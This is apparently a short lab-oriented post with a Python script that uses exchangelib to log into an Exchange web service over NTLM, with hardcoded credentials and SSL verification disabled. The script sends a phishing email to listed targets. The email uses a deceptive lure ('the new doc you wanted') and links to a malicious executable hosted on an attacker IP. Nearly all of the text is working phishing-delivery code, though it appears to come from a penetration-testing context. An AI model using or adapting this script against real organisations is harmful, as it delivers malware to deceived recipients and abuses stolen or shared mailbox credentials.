Using Python to send Mail via the Outlook web interface
Info
quick download: git clone https://gist.github.com/fyxme/7dd838dc406c3b76ee722b89e5893d33
Sending Mail via the Outlook web interface using NTLM and Python:
send-mail.py
# installing requirements
# pip install exchangelib
from exchangelib import Configuration, Credentials, Account, Message, Mailbox, FileAttachment,DELEGATE, HTMLBody
import sys, json
# bypass SSL
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
if __name__ == "__main__":
U = 'LAB\\myuser'
P = 'England1950'
malicious_payload_url = "http://10.10.14.5:8080/payload.x64.exe"
ews_url = 'https://10.10.10.10/EWS/Exchange.asmx'
ews_auth_type = 'NTLM'
primary_smtp_address = 'myuser@lab.local'
cred = Credentials(U, P)
config = Configuration(service_endpoint=ews_url, credentials=cred, auth_type=ews_auth_type)
acc = Account(
primary_smtp_address=primary_smtp_address,
config=config, autodiscover=False,
access_type=DELEGATE,
)
m = Message(
account=acc,
subject='Getting back to you',
#body= '',
body = HTMLBody(f'<html><body><a href="{malicious_payload_url}">Hi, this is the new doc you wanted.. Glhf</a></body></html>'),
to_recipients=[
Mailbox(email_address='target@lab.local'),
Mailbox(email_address='another@lab.local'),
],
cc_recipients=[
# Mailbox(email_address='another@lab.local'),
],
#bcc_recipients=['another_mail@gmail.com'] # you can use just a string list.
)
#m.attach(FileAttachment(name='C:\\Temp\\payload.txt', content='string'.encode('utf-8')))
m.send()